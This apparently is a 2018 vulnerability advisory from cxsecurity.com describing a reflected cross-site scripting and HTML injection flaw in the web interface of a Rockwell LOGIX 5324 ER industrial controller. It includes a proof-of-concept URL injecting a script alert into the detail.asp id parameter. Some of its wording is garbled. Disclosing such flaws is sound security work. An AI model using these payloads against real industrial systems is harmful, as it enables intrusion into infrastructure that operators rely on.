Rockwell LOGIX 5324 ER Cross Site Scripting

2018.04.04
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Vulnerable Product(s): Rockwell SCADA/ICS System Affected Version(s): Rockwell LOGIX 5324 ER Vulnerability Typus: Cross Site Scripting & HTML Adegnjection Description: SCADA systems are crucial for industrial organizations since they help to maintain efficiency, process data for smarter decisions, and communicate system issues to help mitigate downtime. The basic SCADA architecture begins with programmable logic controllers (PLCs) or remote terminal units (RTUs). PLCs and RTUs are microcomputers that communicate with an array of objects such as factory machines, HMIs, sensors, and end devices, and then route the information from those objects to computers with SCADA software. The SCADA software processes, distributes, and displays the data, helping operators and other employees analyze the data and make important decisions. Technical Details: 1. Start the application 2. Go to ipadress.com/ sysform/detail.asp?id=<script>alert(1);</script> 3. oopss. XSS detected 4. Go to sysform/detail.asp?id=html code 5. oppss html injection detected PoC or Exploitcode: ipadress/sysform/detail.asp?id=<script>alert(1);</script> ipadress/sysform/detail.asp?id=html code Author/Group: Adegsmail BALBAL & Sezai Ali HOROZOALU Vendor-URL: https://www.rockwellautomation.com/ Product-URL: https://www.rockwellautomation.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top